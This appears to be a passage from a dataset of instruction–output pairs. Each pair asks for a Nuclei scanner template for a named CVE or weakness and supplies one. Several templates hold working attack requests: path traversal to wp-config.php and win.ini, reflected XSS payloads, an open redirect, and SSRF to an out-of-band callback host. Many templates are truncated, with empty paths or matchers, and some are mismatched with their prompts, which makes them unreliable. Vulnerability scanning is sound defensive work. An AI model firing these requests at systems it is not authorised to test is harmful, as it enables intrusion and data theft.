xwiki xwiki\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-29925\n\ninfo:\n name: XWiki REST API - Private Pages Disclosure\n author: ritikchaddha\n severity: high\n description: A vulnerability in XWiki's REST API allows unauthenticated users to access information about private pages through the pages endpoint. This could lead to disclosure of sensitive information and page metadata.\n tags: cve,cve2025,xwiki,rest-api,exposure,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/{{path}}\" \n matchers:\n - type: word\n words:\n - \"/%2e%2e\u201d https://icewarp.domain.com///%2e%2e\u201d . This vulnerability has been tested in Firefox.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: icewarp mail_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-40630\n\ninfo:\n name: IceWarp Mail Server \u226411.4.0 - Open Redirect\n author: DhiyaneshDK\n severity: medium\n description: IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability that allows attackers to redirect users to arbitrary external domains through malicious URLs.\n tags: cve,cve2025,icewarp,redirect,open-redirect,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2f%5c%2foast.pro%2f..\" \n matchers:\n - type: regex\n part: header\n - type: status\n status:\n - 302", "category": "cve", "severity": "medium", "id": "CVE-2025-40630"} {"instruction": "Generate a Nuclei template for: Docker Daemon Exposed", "input": "Title: Docker Daemon Exposed\nSummary: Docker Daemon Exposed. Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: docker-daemon-exposed\n\ninfo:\n name: Docker Daemon Exposed\n author: Arm!tage\n severity: critical\n description: Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.\n tags: docker,exposure,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "critical", "id": "docker-daemon-exposed"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: huawei-HG532e-default-login\n\ninfo:\n name: Huawei HG532e Default Credential\n author: pussycat0x\n severity: high\n description: Huawei HG532e default admin credentials were discovered.\n tags: default-login,huawei,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Set-Cookie: SessionID\" \n part: header\n - type: word\n words:\n - \"replace\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for: Service Account Creation Not Disabled", "input": "Title: Service Account Creation Not Disabled\nSummary: Service Account Creation Not Disabled. Ensure that the creation of Cloud IAM service accounts is prevented within your Google Cloud organization through the \"Disable Service Account Creation\" organization policy. This allows you to easily centralize the management of your service accounts while not restricting the other permissions that your developers and administrators have on the projects within the organization.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-org-service-account-creation\n\ninfo:\n name: Service Account Creation Not Disabled\n author: princechaddha\n severity: medium\n description: Ensure that the creation of Cloud IAM service accounts is prevented within your Google Cloud organization through the \"Disable Service Account Creation\" organization policy. This allows you to easily centralize the management of your service accounts while not restricting the other permissions that your developers and administrators have on the projects within the organization.\n tags: cloud,devops,gcp,gcloud,resourcemanager,security,iam,service-account,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-org-service-account-creation"} {"instruction": "Generate a Nuclei template for: Booked < 2.2.6 - Broken Authentication", "input": "Title: Booked < 2.2.6 - Broken Authentication\nSummary: Booked < 2.2.6 - Broken Authentication. The Booked plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions hooked via AJAX actions in versions up to, and including, 2.2.5. This makes it possible for authenticated attackers with subscriber-level permissions and above to execute several unauthorized actions.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: booked-export-csv\n\ninfo:\n name: Booked < 2.2.6 - Broken Authentication\n author: random-robbie\n severity: high\n description: The Booked plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions hooked via AJAX actions in versions up to, and including, 2.2.5. This makes it possible for authenticated attackers with subscriber-level permissions and above to execute several unauthorized actions.\n tags: wordpress,wpscan,wp-plugin,wp,booked,bypass,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"End Time\" \n - \"Start Time\" \n - \"Calendar\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/csv\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "booked-export-csv"} {"instruction": "Generate a Nuclei template for: Authentik Panel - Detect", "input": "Title: Authentik Panel - Detect\nSummary: Authentik Panel - Detect. An Authentik search engine was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: authentik-panel\n\ninfo:\n name: Authentik Panel - Detect\n author: rxerium\n severity: info\n description: An Authentik search engine was detected.\n tags: authentik,sso,mfa,panel,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/static/dist/assets/icons/icon.png\" \n matchers:\n - type: word\n words:\n - \"authentik\" \n - \"window.authentik\" \n - \"authentik.css\" \n part: body\n condition: or\n - type: dsl", "category": "generic", "severity": "info", "id": "authentik-panel"} {"instruction": "Generate a Nuclei template for CVE-2023-48777", "input": "Title: Unrestricted File Upload in elementor website_builder\nSummary: Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder.This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.\n\n\nVulnerability Type: Unrestricted File Upload\nSeverity: critical\nAffected Products: elementor website_builder\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-48777\n\ninfo:\n name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution\n author: DhiyaneshDK\n severity: critical\n description: The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-48777"} {"instruction": "Generate a Nuclei template for CVE-2021-41293", "input": "Title: Path Traversal in ecoa ecs_router_controller-ecs_firmware and others\nSummary: ECOA BAS controller suffers from a path traversal vulnerability, causing arbitrary files disclosure. Using the specific POST parameter, unauthenticated attackers can remotely disclose arbitrary files on the affected device and disclose sensitive and system information.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: ecoa ecs_router_controller-ecs_firmware, ecoa riskbuster_firmware, ecoa riskterminator\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-41293\n\ninfo:\n name: ECOA Building Automation System - Arbitrary File Retrieval\n author: 0x_Akoko\n severity: high\n description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.\n tags: cve2021,cve,ecoa,lfi,disclosure,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2021-41293"} {"instruction": "Generate a Nuclei template for CVE-2019-17231", "input": "Title: Cross-Site Scripting (XSS) in mageewp onetone\nSummary: includes/theme-functions.php in the OneTone theme through 3.0.6 for WordPress has multiple stored XSS issues.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: mageewp onetone\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-17231\n\ninfo:\n name: WordPress OneTone theme <= 3.0.6 \u2013 Unauthenticated Stored XSS\n author: daffainfo\n severity: medium\n description: includes/theme-functions.php in the OneTone theme through 3.0.6 for WordPress has multiple stored XSS issues.\n tags: cve,cve2019,wordpress,wp-theme,wp,onetone,xss,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2019-17231"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: public\n\ninfo:\n name: Public User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Public user name information check was conducted.\n tags: osint,osint-finance,public,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://public.com/@{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \") Investment Portfolio on Public\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Backwash Malware Hash - Detect", "input": "Title: Backwash Malware Hash - Detect\nSummary: Backwash Malware Hash - Detect. CPP loader for the Backwash malware.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: backwash-malware-hash\n\ninfo:\n name: Backwash Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: CPP loader for the Backwash malware.\n tags: malware,xegroup\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "backwash-malware-hash"} {"instruction": "Generate a Nuclei template for CVE-2021-24275", "input": "Title: Cross-Site Scripting (XSS) in supsystic popup\nSummary: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: supsystic popup\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24275\n\ninfo:\n name: Popup by Supsystic <1.10.5 - Cross-Site scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue.\n tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24275"} {"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: wp-tinymce-lfi\n\ninfo:\n name: Tinymce Thumbnail Gallery <=1.0.7 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Tinymce Thumbnail Gallery 1.0.7 and before are vulnerable to local file inclusion via download-image.php.\n tags: wpscan,wordpress,wp-theme,lfi,tinymce,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php\" \n matchers:\n - type: word\n words:\n - \"DB_NAME\" \n - \"DB_PASSWORD\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: fortinet-fortios-management-panel\n\ninfo:\n name: Fortinet FortiOS Management Interface Panel - Detect\n author: mbmy\n severity: info\n description: Fortinet FortiOS Management interface panel was detected.\n tags: panel,fortinet,fortios,fortigate,fortiproxy,fortiap,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login?redir=/ng\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"\" \n condition: and\n - type: word\n words:\n - \"APSCOOKIE_\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2020-28976", "input": "Title: Vulnerability (CWE-918) in canto canto\nSummary: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: medium\nAffected Products: canto canto\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-28976\n\ninfo:\n name: WordPress Canto 1.3.0 - Blind Server-Side Request Forgery\n author: LogicalHunter\n severity: medium\n description: WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Canto\" \n - \"Tested up to:\" \n condition: and\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}\" \n - \"{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}\" \n - \"{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}\" \n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: word\n words:\n - \"null\" \n part: body\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2020-28976"} {"instruction": "Generate a Nuclei template for CVE-2005-3344", "input": "Title: Unknown Vulnerability in horde horde\nSummary: The default installation of Horde 3.0.4 contains an administrative account with a blank password, which allows remote attackers to gain access.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: horde horde\nIndicators: error, vulnerability detected", "output": "id: CVE-2005-3344\n\ninfo:\n name: Horde Groupware Unauthenticated Admin Access\n author: pikpikcu\n severity: critical\n description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.\n tags: cve2005,cve,horde,unauth,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/horde/admin/user.php\" \n - \"{{BaseURL}}/admin/user.php\" \n matchers:\n - type: word\n words:\n - \"Horde :: User Administration\" \n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2005-3344"} {"instruction": "Generate a Nuclei template for: SPNEGO - Detect", "input": "Title: SPNEGO - Detect\nSummary: SPNEGO - Detect. SPNEGO stands for Simple and Protected GSSAPI Negotiation Mechanism. It is a protocol used for secure authentication and negotiation between client and server applications in a network environment. SPNEGO is based on the Generic Security Services Application Programming Interface (GSSAPI) framework.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: spnego-detect\n\ninfo:\n name: SPNEGO - Detect\n author: lady_bug,ruppde\n severity: info\n description: SPNEGO stands for Simple and Protected GSSAPI Negotiation Mechanism. It is a protocol used for secure authentication and negotiation between client and server applications in a network environment. SPNEGO is based on the Generic Security Services Application Programming Interface (GSSAPI) framework.\n tags: miscellaneous,misc,windows,spnego,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl", "category": "generic", "severity": "info", "id": "spnego-detect"} {"instruction": "Generate a Nuclei template for: Alibaba Mongoshake Unauth", "input": "Title: Alibaba Mongoshake Unauth\nSummary: Alibaba Mongoshake Unauth. Tags: mongoshake, unauth, alibaba\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: alibaba-mongoshake-unauth\n\ninfo:\n name: Alibaba Mongoshake Unauth\n author: pikpikcu\n severity: info\n description: Alibaba Mongoshake Unauth\n tags: mongoshake,unauth,alibaba,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/\" \n matchers:\n - type: word\n words:\n - \"{\"Uri\":\"/worker\",\"Method\":\"GET\"}\" \n - type: word\n words:\n - \"text/plain\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "alibaba-mongoshake-unauth"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: geocaching\n\ninfo:\n name: Geocaching User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Geocaching user name information check was conducted.\n tags: osint,osint-social,geocaching,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.geocaching.com/p/?u={{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Groundspeak - User Profile\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: furaffinity\n\ninfo:\n name: FurAffinity User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: FurAffinity user name information check was conducted.\n tags: osint,osint-images,furaffinity,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.furaffinity.net/user/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Userpage of\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2023-2256", "input": "Title: Cross-Site Scripting (XSS) in themeisle product_addons_\\&_fields_for_woocommerce\nSummary: The Product Addons & Fields for WooCommerce WordPress plugin before 32.0.7 does not sanitize and escape some URL parameters, leading to Reflected Cross-Site Scripting.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: themeisle product_addons_\\&_fields_for_woocommerce\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-2256\n\ninfo:\n name: WordPress Product Addons & Fields for WooCommerce < 32.0.7 - Cross-Site Scripting\n author: ritikchaddha\n severity: high\n description: The Product Addons & Fields for WooCommerce WordPress plugin before version 32.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape some URL parameters in the admin panel, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.\n tags: cve,cve2023,wp,wordpress,wp-plugin,xss,woocommerce,woocommerce-product-addon,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"woocommerce-product-addon\" \n - \"woocommerce\" \n part: body\n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"><script>alert(document.domain)</script>\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-2256"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: itchio\n\ninfo:\n name: Itch.io User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Itch.io user name information check was conducted.\n tags: osint,osint-gaming,itchio,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://itch.io/profile/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"A member registered\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Firebaseio Rentokil", "input": "Title: Content-Security-Policy Bypass - Firebaseio Rentokil\nSummary: Content-Security-Policy Bypass - Firebaseio Rentokil\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: firebaseio-rentokil-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Firebaseio Rentokil\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Firebaseio Rentokil\n tags: xss,csp-bypass,firebaseio-rentokil,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"firebaseio.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "firebaseio-rentokil-csp-bypass"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: fark\n\ninfo:\n name: Fark User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Fark user name information check was conducted.\n tags: osint,osint-social,fark,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.fark.com/users/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Fark account number\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: cherry-file-download\n\ninfo:\n name: Cherry Plugin < 1.2.7 - Arbitrary File Retrieval and File Upload\n author: 0x_Akoko\n severity: high\n description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.\n tags: wordpress,wp-plugin,lfi,wpscan,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php\" \n matchers:\n - type: word\n words:\n - \"DB_NAME\" \n - \"DB_PASSWORD\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: kafka-consumer-monitor\n\ninfo:\n name: Apache Kafka Consumer Offset Monitor Panel - Detect\n author: dhiyaneshDK\n severity: info\n description: Apache Kafka Consumer Offset Monitor panel was detected.\n tags: panel,kafka,apache,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"<title>Kafka Consumer Offset Monitor\"", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-34093", "input": "Title: Cross-Site Scripting (XSS) in softwarepublico i3geo\nSummary: Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: softwarepublico i3geo\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-34093\n\ninfo:\n name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.\n tags: cve,cve2022,i3geo,xss,softwarepublico,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-34093"} {"instruction": "Generate a Nuclei template for: Security Onion Panel - Detect", "input": "Title: Security Onion Panel - Detect\nSummary: Security Onion Panel - Detect. Security Onion is a free and open source Linux distribution for intrusion detection, security monitoring, and log management. It includes CyberChef, NetworkMiner, and many other security tools.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: security-onion-panel\n\ninfo:\n name: Security Onion Panel - Detect\n author: rxerium\n severity: info\n description: Security Onion is a free and open source Linux distribution for intrusion detection, security monitoring, and log management. It includes CyberChef, NetworkMiner, and many other security tools.\n tags: panel,security,onion,detect,securityonionsolutions,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/login/\" \n matchers:\n - type: word\n words:\n - \"Security Onion\" \n - \"Login to Security Onion\" \n - \"Security Onion Solutions\" \n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "security-onion-panel"} {"instruction": "Generate a Nuclei template for: Blazor WebAssembly - Detect", "input": "Title: Blazor WebAssembly - Detect\nSummary: Blazor WebAssembly - Detect. Blazor WebAssembly application was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: blazor-webassembly-detect\n\ninfo:\n name: Blazor WebAssembly - Detect\n author: righettod\n severity: info\n description: Blazor WebAssembly application was detected.\n tags: blazor,webassembly,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_framework/blazor.boot.json\" \n matchers:\n - type: word\n words:\n - \"dotnet.wasm\" \n - \"\"entryAssembly\"\" \n - \"\"Microsoft.JSInterop.WebAssembly.dll\"\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "blazor-webassembly-detect"} {"instruction": "Generate a Nuclei template for CVE-2019-20085", "input": "Title: Path Traversal in tvt nvms-1000_firmware\nSummary: TVT NVMS-1000 devices allow GET /.. Directory Traversal\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: tvt nvms-1000_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-20085\n\ninfo:\n name: TVT NVMS 1000 - Local File Inclusion\n author: daffainfo\n severity: high\n description: TVT NVMS-1000 devices allow GET /.. local file inclusion attacks.\n tags: cve,cve2019,iot,lfi,kev,edb,packetstorm,tvt,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2019-20085"} {"instruction": "Generate a Nuclei template for CVE-2015-4063", "input": "Title: Cross-Site Scripting (XSS) in newstatpress_project newstatpress\nSummary: Cross-site scripting (XSS) vulnerability in includes/nsp_search.php in the NewStatPress plugin before 0.9.9 for WordPress allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: low\nAffected 